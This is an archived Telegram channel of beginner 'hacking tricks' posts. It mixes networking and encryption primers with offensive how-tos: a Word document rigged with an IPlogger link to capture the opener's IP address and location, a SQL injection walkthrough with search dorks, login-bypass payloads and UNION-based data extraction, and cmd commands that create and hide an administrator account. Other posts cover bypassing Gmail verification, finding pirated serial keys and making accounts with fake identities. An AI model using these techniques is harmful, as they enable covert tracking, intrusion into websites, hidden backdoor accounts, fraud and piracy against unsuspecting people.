Hacking And Cryptocurrency For Beginners
前往频道在 Telegram
1 258
订阅者
无数据24 小时
-47 天
-2030 天
帖子存档
🧑💻How to infect Microsoft Office documents?🧑💻
Today we'll talk about how Microsoft Word is infected and why you shouldn't open unverified documents, pdfs, etc. Brought to you by hackfreaks official Viruses, tracking, refs - these are exactly the things that integrate well into Word. Usually, people do not check documents for vulnerabilities, and antiviruses do not sound the alarm, so attackers are actively using this. We, in turn, will not embed a specific virus, but simply consider this method using the example of IPloggers : https://iplogger.org/
Instructions:
1. Create a new Word document> Go to the "insert" tab> item "integrate video from the Internet"
2. Select YouTube> write the desired channel name and select the video. Everything. Our video in file
(you can choose any other site, not necessarily YouTube)
3. Save and close the document> run WinRAR> find our document
4. Click on the document and its internal content opens> open the word folder> see the document.xml file
5. Drag it to the desktop and open it through notepad> find a link to our video in it and replace it with the IPlogger link
6. Save and return to Winrar
Everything. Now if you open our Word document, the movie will remain there. Even if you hover the cursor, a link to the video will be displayed, and not to IPlogger. And keep joining Hacking for beginers . After a person tries to watch the video, we will instantly receive his coordinates and IP address. Such manipulations in Word can be done with absolutely anything, so there is only one conclusion - check everything and always
🧑💻 @learnhackingtricks 🧑💻
🧑💻 How To Bypass Gmail Mobile Verification Tutorial 🧑💻
1. Go To K7.net Sign up there.
2. Create an account on gmail, but in location fill United States.
3. After Creating your e-mail account,Now it will take you to mobile verification page.
4. Here select the option of Voice call and fill the no: that you got from the website (k7.net)
5. Now you will get a mail having verification code as voice mail on that account from which you have registered on.
6. Go open it, Download the attachment file and listen the code after that type the code of your voice mail in verification code and click OK.
Your account is ready now.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 How To Find The Serial Key Of Any Software Free 🧑💻
1. First You Have To open Google Homepage or Google Front page.
2. Type there your Software Name and“94FBR“ (For e.g. ” Photoshop 94FBR“)
3. In Google search result you see your product key name or you can open any webpage link.
Use any product key and enjoy fully licensed software.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 What is SQL Injection?🧑💻
SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login. Requirements :-
• SQL Injection Dorks.
• Vulnerable Website.
• Firefox with Hack bar add-on.
• Little bit understanding ofSQL
• Fresh Mind to Understand it.
Step 1. Find Vulnerable website. An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.Use any one of the following…
► “inurl:admin.asp”
► “inurl:login/admin.asp”
► “inurl:admin/login.asp”
► “inurl:adminhome.asp”
► “inurl: admin.php”
► “inurl: login/admin.php”
► “inurl: admin/login.php”
► “inurl: login administrator.php”
Now you can use the following code and inject into user id and password field. For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.
• test’or1–
• ‘or 1=1#
• 1’or’1’=’1
• ‘)or1=1—
• ‘or ” = ‘
• ‘or’1’=’1
• ‘ or ‘1’=’1
• ‘ or 0=0 —
• ” or 0=0 —
• or 0=0 —
• ‘ or 0=0 #
• ‘or’ ‘=’
• ‘or’1=1’
• “) or (“a”=”a
• ‘) or (‘a’=’a
• ” or “a”=”a
• ‘ or a=a–
• or 1=1–
• ” or 1=1–
If found no luck with this method then try given below.
How to Check for Vulnerability.
To Check the Vulnerability put sigle Quote ( ) at the end of the website URL and Hit Enter.If the page remains same or Not found then its not vulnerable and if the page shows Error like this :- An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near /contentPage.php?id=8 at line 1
This means the website is vulnerable to SQL Injection.
Step 2. Find the number of Columns. We found SQL Injection Vulnerable webstie now its time to find no. of Columns present in the Database. To do that replace that one single quote ( ) with Order By no. Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like Unknown Column Example:www.targetwebsite.com/index.php?id=8 Order by 1
If you get an Error on Order by 9 that means the DB have 8 number of Columns
Step 3. Find the Vulnerable Column. Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query Union Select columns_sequence. And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign -before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-
targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11— ✔ And Once if the Query has been Executed then it will display the number of Column. Yeahh.... !!
In the Above result, I found three vulnerable Columns 2,3
Step 4. Finding version, Database and User. Now this time to find out website Database version and User Just replace Vulnerable Column no. with version() For Eg. targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11—
And Enter
🧑💻@learnhackingtricks🧑💻
🧑💻 How To Remove Shortcut Virus From Your Pc 🧑💻
✅ Method 1.
- Clean up and remove Shortcut Virus by CMD -
1. Click on Start and select Run;
2. Type: CMD and Hit Enter to open Command Prompt;
3. Type the drive letter of your hard drive partition in PC or USB flash drive and hit Enter; (G for example.)
4. Type: attrib g:*.* /d /s -h -r -s and hit Enter.
You’ll be able to see your files and data on Windows PC or USB flash drive now.
✅Method 2.
-Cleanup Shortcut Virus with Shortcut Virus Remover or Anti-virus Software-
*If you need a double guarantee, you can download and install anti-virus software to clean up all shortcut virus from Windows 10/8/7 computer and USB etc external storage devices. Here below you’ll see a list of anti-virus software and tools and you can selectively choose one to try*
➡️Trojan Removal Tool;
➡️Shortcut virus fixfolder;
➡️Malwarebytes Anti-Malware, etc.
✅Method 3.
- Delete/Wipe Shortcut Virus from Registry -
1. Press Win+R and type: regedit to enter the registry;
2. Navigate to HKEY_CURRENT_USER > Click on Software > Microsoft > Windows > CurrentVersion > Click Run;
3. Press Win + R, type: msconfig > Click OK;
4. In Startup, uncheck everything except for the anti-virus software.
5. Click OK > Click Restart now.
✅ Method 4
- Remove It By .bat File -
1. Open notepad
2. Copy & paste below given code
@echo off
attrib -h -s -r -a /s /d Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
@echo complete
3. Save the file with remove virus.bat
"Now replace the Name_drive with infected drive name , if you have more than 3 drive simply copy and paste the command"
4. Now simply close the file and run it.
-Once everything done …remove file from drive and folder too.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 To be hacker these are Networking Terms You
Really Need To Know 🧑💻
1. Server
Server is a device that provide services. It is mostly a computer which contains the files of a website and sends those files when a user requests for them. When you enter a URL in your address bar you are asking for that page to show and its not website which contains the page, it is a computer which has that
page stored and this computer is called Server . But its not only limited to websites, it can be any device which provides services/information. In simple words a computer which uploads data for users is called a server.
2. Client
A user of a service is called Client. You are downloading stuff? You are a client. You visit a web page? You are client. Thats pretty simple, A computer which downloads something from a server is called a Client .
3. Cache
Whenever we do something the software has to do some processing right? Yep, and it takes time. But some programs/ devices has a feature that can store information about the tasks that the user does often so it can give faster results when the same task is requested by the user. This process is called Caching and the stored data is called Cache.
4. Cookies
Now thats a delicious word but a cookie means something totally different in case of networking. Lets take an example, I am using Facebook and my mom calls me for lunch so I turn off my data connection and I turn it on after sometime after lunch Now I open Facebook again and here is what happens:
Me: Opens Facebook
Facebook: Login to continue
Me: Wtf man? Its me Somdev! Do I need to login every time? I mean this is really annoying mate.
Facebook: But this is a security check
sir! But if you find it annoying then you can show us a cookie instead.
Me: Cookie? Whats that?
Facebook: Every time you log into your Facebook Account we send a small piece of data to you called Cookie . It helps us to identify us that its you.
Me: Oh that’s cool. Well yeah this is what a cookie does, it is sent by a website and stored in your browser. It tells the website about the previous interactions you have made with the website so the website can provide you better services.
5. Address Resolution
Protocol (ARP)
Do you guys know what is a LAN ? Well “A group of computers which share a
common Internet connection is called Local Area Network.” So if 3 computers use the same router they are in LAN. But there is something interesting about
LAN, when two computers in a LAN want to connect to each other then IP Address is not sufficient, we need MAC
Address too. But as I told you before that when a data packet is sent it contains IP Address and Port number but not MAC Address. So how they can
know MAC Addresses of each other? Well that’s where Address Resolution Protocol comes into play. Lets imagine two computers A and B are in a LAN and Computer A wants to
connect to Computer B so can A connect directly to B? No. They have to verify if this is the same computer they want to connect to. Lets see how it works:
1. Computer A sends an ARP request its like asking “Hi! I was looking for computer with IP Address 192.168.42.4
and I think thats you! And it looks like we are in a LAN so can you please tell me whats your MAC Address?
2. Computer B sends him a confirmation like “Yeah bro That’s me and here is my
MAC Address”.
3. Computer A “Yeah now we can establish a connection” and then Computer A builds a cache where it can store the MAC Address of Computer B so that it can connect faster next time. This is what ARP does, it asks for MAC Address before connection if the target computer is in LAN.
I hope you guys enjoyed this article this article about networking terms.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 How To Increase Virtual RAM To Make Your System Faster And Smoother 🧑💻
1. Right Click 'My Computer' and then Select 'Properties'
2. Click on the 'Advanced' tab
3. Under 'Performance', click 'Settings'
4. Then click the 'Advanced' tab on the button that pops up
5. Under 'Virtual Memory' at the bottom, click 'Change'
6. Click the 'Custom Size' button
7. For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000)
8. Click 'Set', and then exit out of all of the windows
9. Finally, Restart your computer
10. You now have a faster computer and 1-6 GB (as specified by you in step 7) of Virtual RAM.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 A number of Cool
CMD Tricks 🧑💻
- See users via Cmd:
Net user
- Make a new user via Cmd:
net user (USER) (PASS) / add
- Accessing the user via Cmd:
net localgroup administrators (USER) / add
- View the latest admin login to the server via Cmd:
quser
- Delete the user via Cmd:
net user (USER) / delete
-Change the user's password via Cmd:
Net user (USER) (PASS)
- Hide the user via Cmd:
reg add "hklm \ software \ microsoft \ windows nt \ currentversion \ winlogon \ specialaccounts \ userlist" / v (USER) / t reg_dword / d 0 / f
-Download files via Cmd:
bitsadmin / transfer myDownloadJob / download / priority normal (DIRECT LINK) c: \ file.zip
- View the number of server cores via Cmd:
wmic cpu get NumberOfCores, NumberOfLogicalProcessors / Format: List
- Turn off the server via Cmd:
shutdown -s
- Restart the server via Cmd:
shutdown -r
-Serf server log through Cmd:
shutdown -l
🧑💻 @learnhackingtricks 🧑💻
🧑💻 Dark Web (Deep Web) 🧑💻
is a network that is out of the reach of the public and requires special software to navigate.
Most of these websites have an onion suffix. They end up not available through search engines. Drug dealers, hackers, terrorists and profiteers usually operate in this space and it is difficult or impossible to track them. Excursions in this space may seem exciting; But ignoring safety tips will be a big problem.
1. Open onion websites. By browsing and not using TOR
Websites like Tor2Web and Onion2web allow users to access onion websites. They are easily provided on browsers such as Chrome. Doing so will reveal the device's IP address and hackers will attack the system. To avoid being hacked by hackers, use the TOR browser when browsing Darkoob. TOR software keeps activities and communications secret and secure.
2. Use TOR without using VIPs
It is essential to use a virtual private network or VPN when browsing the Black Web. TOR has been damaged several times in the past; For this reason, the use of VPN along with the TOR browser is recommended. Preliminarily, the use of VPN was only an additional protective layer; But since government agencies, such as white hat and black hat hackers, are finding a way to break the TOR encryption system and find the real IP of the user, their use is essential. Monetary VPNs are usually better than free versions and offer more features such as the ability to track and block ads.
3. Activate macros and scripts
Activating macros and scripts, such as JavaScript, is very dangerous; Unless you are familiar with and trust the website. For example, browsing YouTube via TOR requires activating scripts to run its videos. Enabling scripts is safe in this example; Because YouTube is a safe and secure website that Google manages. However, activating scripts on onion websites. It is very dangerous. These websites can download everything on the system, such as Edur and Trojan Horse, and other malicious software, without the user's knowledge. This can lead to frequent display of annoying pop-ups or even the ability to control the computer remotely. TOR by default disables all macros and scripts.
4. Download files from unknown or unreliable websites
There is no need to download files from unknown and unreliable websites; But many users still cheat or download files automatically to their computer. Don't download any file just because it's interesting. Unless you have complete confidence in its website. However, if you really have to do this, there is a safe solution. Using a virtual machine (Virtual Machine), such as Virtual Box, in Sandbox mode, separates the operating system installed on the virtual machine from the main computer or Mac operating system. This method is so reliable that you can also download the content you want from Darkweb.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 Hacking Facts That
Will Blow Your Mind 🧑💻
1. There Is A Hacker Attack Every 39 Seconds.
2. Cybercrime Is More Profitable Than The Global Illegal Drug Trade.
3. Hackers Steal 75 Records Every Second.
4. 66% Of Businesses Attacked By Hackers Weren’t Confident They Could Recover.
5. Hackers Create 300,000 New Pieces Of Malware Daily.
6. The Cybersecurity Budget In The US Is $14.98 Billion In 2020.
7. White Hat Hackers Earned Over $19 Million In Bounties In 2019.
8. Russian Hackers Can Infiltrate A Computer Network In 18 Minutes.
9. You Can Purchase A Consumer Account For $1 On The Dark Market.
10. 92% Of ATMs Are Vulnerable To Hacker Attacks.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 Introduction To Encryption🧑💻
Before we learn about Encryption try
reading this —> hsrdzrx
Of course you can read that but do you
think it has meaning? Its meaningless
right?
You will get your answer soon.
So me and my friend wanted to develop
a secret language (something like code
words) to talk secretly and I came up
with an idea. I wrote hsrdzrx on a paper
and gave it to him and he was like what
the hell is this? Some randomly placed
letters?
I laughed and asked him to replace
every letter with the next alphabet,
Umm like replacing D with E, Y with Z
and so on..
So when he did that he got this,
h ----> i
s ----> t
r ----> s
d ----> e
z ----> a
r ----> s
x ----> y
So this message (hsrdzrx) actually
meant itseasy .
Now lets use this analogy to understand
basic Encryption terms:
1. Plaintext
I wanted to say “itseasy” in above
example which is readable (by someone
who knows English) and it is something
we call Plaintext or Cleartext.
More technically I will say,
Data which can be read simply without
using any special measures is called
Plaintext or Cleartext.
2. Algorithm
The method I used to convert itseasy
into hsrdzrx (i.e. replacing the letter
with the next alphabet) is something we
call an operation , and the sequence of
two or more* operations is called an
Algorithm
3. Ciphertext
So applied an algorithm to the Plaintext
and got the coded text i.e. hsrdzrx which
is an example of Ciphertext.
4. Encryption
The process of applying algorithm to a
Plaintext to convert it into a Ciphertext
is called Encryption .
5. Decryption
The process of converting Ciphertext to
Plaintext is called Decryption .
So is that all about Encryption? No..keep
reading.
Me and my friend were very happy to
have our conversation encrypted but
then something bad happened. One of
our classmates guessed the way in
which we were encrypting our messages
and we were exposed.
Now we had to find a permanent
solution and we got one.
We bought a pen (with red colored LED
at the cap) whose ink was only visible in
green light, so we started to use that
pen to write our Ciphertext which gave
us added security to our Encryption.
We will call that pen a Key . So if
someone wants to read our messages he
will need that key.
Or in more technical words I would say,
A key is a piece of information that
allows only those that hold it to encode
and decode a message.
So as we encrypted itseasy by using the
next alphabet but as a key we may
replace our letter with the 5th next
alphabet like,
A B C D E F G H I J K L M
N O P Q R S T U V W X Y
Z
| | | | | | | | | | | | |
| | | | | | | | | | | |
|
F G H I J K L M N O P Q R
S T U V W X Y Z A B C D
E
Then the key will be 5 and to decrypt
the data the receiver needs to know he
key before he can decrypt the message.
Now there are two of encryptions,
1. Symmetric Encryption
The sender encrypts the message and
sends the data to the receiver and then
sends the key which can be used to
decrypt the message. But what if a
hacker intercepts the sent information?
Yep…He will be able to decrypt
everything.
2. Asymmetric Encryption
This type of encryption involves two type
of keys, a Public Key and a Private key .
Public key is used to Encrypt the
message and a Private Key is used to
Decrypt the message.
So like you are setting up a Shopping
Website you may give Public key to
users so they can (actually their
browser/program does that) encrypt
their Credit Card details.
Now only YOU own the Private Key
which can decrypt the data.
So Encryption is used to encrypt text?
Naah…
It is used to encrypt Data . You can
encrypt your Hard Drive with a custom
key. VPN (We are gonna talk about it
soon) is a good example of encryption.
SSL (Secure Sockets Layer) technology
also uses Encryption to provide secure
connections.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 Generate unlimited phone numbers of any country 🧑💻
1) connect your VPN to USA country
2) Go to www.twilio.com/ website in your browser.
3) click on "Get a Free API Key".
4) sign up using fake USA information from here (https://www.fakenamegenerator.com/)
5) for email don't use temp mail use @outlook.com, @gmail.com, @hotmail.com, @Yahoo.com for 100% success. (@outlook.com recommanded)
6) Choose "JAVA" in language.
7) in mobile number verification use textnow virtual number or use your real number for verification.
8) after verification your project menu appear.
9) choose Templetes -> phone numbers
10) give any name to your project and skip other steps.
11) once project is created click on phone numbers.
12) select country then search.
13) select any number from the display and click "Buy".(dont worry there is no payment method).
14) click on setup number. Done you just create one virtual number with Calling, SMS , MMS facility.
15) for unlimited number release the previous number and buy another number.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 HOW TO SEND ANONYMOUS SMS TO ANY NUMBER 🧑💻
Till now you had only try sending SMS using your mobile number or using some of online website that first takes your personal information and then display it on the receiver of the message.
But if i give you a way by which you can send SMS without entering any details that is anonymously and receiver will not identify that who had actually send the SMS.
So we are here with the way for How To Send Anonymous SMS To Any Number.
The method is very simple and straight just follow the below method to proceed.
The method is actually based on sending SMS using some online websites that will allow you to send SMS without entering any personal details. So just have a look on the websites to send free Anonymous SMS.
List of Websites To Send Anonymous SMS To Any Number :-
#1 Seasms.com
#2 Spicesms.com
#3 Smsti.in
#4 Sendanonymoussms.com
#5 Armsms.com
This is one of the best anonymous
SMS sending portal that allow you to send any message all over the world that absolutely free.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 How to hide a file in
a picture 🧑💻
When it comes to the safety of especially important data, then this must be approached with the utmost seriousness.
And as you know, in order to hide information well, you need to leave it in the most conspicuous place, and this can be done by hiding the data in the picture.
Let's get started:
1. First, create a folder and move the file (s) you want to hide into it.
2. Select them and create a rar / zip archive.
3. Take any picture and move it to the previously created folder.
4. Open a command prompt CMD as Administrator.
5. And then write the following command:
• cd "Path to folder"
6. Next enter:
• COPY / B "picture name" .png + "archive name" .rar picture "which will contain files" .png
After that, a picture will appear on the desktop, which contains your data.
If you open it as usual, the piccha will open, but if you open it as an archive, then your files will be there.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 Protect Your Modem from DoS and DDoS Attacks 🧑💻
Below, we are going to share some of the best methods that would help you to protect your modem from Denial-of-service attacks in 2020.
You can do this by simply detaching power from the modem and if your PC is connected directly to your modem then turn it off also and put everything as such for 10 minutes. Again connect everything and power
them on and then you will see everything works and then it is DOS attack for sure.
1. Use Virtual Private Networks
Use Virtual Private Networks
These are the anonymous networks that are spread worldwide. What
happens is if you use this VPN service, all your traffic is passed through
a range of networks. In this way, your real IP Address is kept hidden.
This is the easiest and the quickest way to safeguarding and preventing
your Modem from a Denial of Service.
2. Anti-Virus and Anti-Malware
Protect Your Modem from a Denial-of-Service
The ultimate role of Antivirus tools here is to stop hackers from detecting your IP. Another benefit of having solid defense software like Antivirus and firewall includes protecting you from being a target if an
attacker launches a DoS or DDoS attack on the gaming servers that you use.
3. Firewalls
Well, firewalls play an important role when it comes to protect or dodge DDoS attacks. Antivirus tools can stop hackers from accessing your IP Address. However, Firewall tools can help users to monitor all incoming and outgoing traffic. The firewall would warn if it detects any inappropriate traffic. Furthermore, firewall protection can also prevent
Trojan viruses from recruiting your device. So, install a firewall on all computers connected to your network.
🧑💻 @learnhackingtricks🧑💻
🧑💻 What are DoS and
DDoS attacks?🧑💻
If your favourite website is down, there’s a chance it’s suffering a Denial of Service (DoS) attack. This is more likely if the site is an online shop, a bookie or another site that relies financially on being online at all times.
A DoS attack tries to make a web resource unavailable to its users by flooding the target URL with more requests than the server can handle. That means that during the attack period, regular traffic on the website will be either slowed down or completely interrupted.
A Distributed Denial of Service (DDoS) attack is a DoS attack that comes from more than one source at the same time.
A DDoS attack is typically generated using thousands (potentially hundreds of
thousands) of unsuspecting zombie machines. The machines used in such attacks are collectively known as “botnets” and will have previously been infected with malicious software, so they can be remotely controlled by the attacker. According to research, tens of millions of computers are likely to be infected with botnet programs worldwide.
🧑💻 @learnhackingtricks 🧑💻
🧑💻 Change Processor Name Permanently 🧑💻
1. Open Notepad.
2. Copy and paste the exact code given below:-
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System
\CentralProcessor\0]
"ProcessorNameString"=" My Processor name 50000MHz "
To change the processor name, edit the part of the code given in blue.
Also understand that \0 in the above code should only be present if
Windows store your processor name at that location. Open the Registry
Editor and navigate to the above mentioned keys to check whether or not
to include the \0.
3. Click on File Menu, click on Save As and select "All Types" in the Save
as Type option. Save the file as ProcessorNameChange.reg or *.reg.
4. Create a new shortcut on your desktop. Enter regedit / S "Location of
the .reg file" as the location of the item. For example, enter regedit /S
"C:\Processor Name.reg " if your registry file is located in the root of C:\
drive.
5. Copy the created Shortcut file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu
\Programs\Startup (in Windows XP) or to C:\Users\ User-Name\AppData
\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows
10, Windows 8, Windows 7 and Windows Vista. Also remember that
AppData is a hidden folder.) if C: is your System drive.
7. Paste the copied file.
This registry file would now execute each time when Windows starts and
the Processor Name String would be modified each time. This means
that even upon restarting your computer, you will see that the changed
processor name is permanent.
🧑💻 @learnhackingtricks 🧑💻
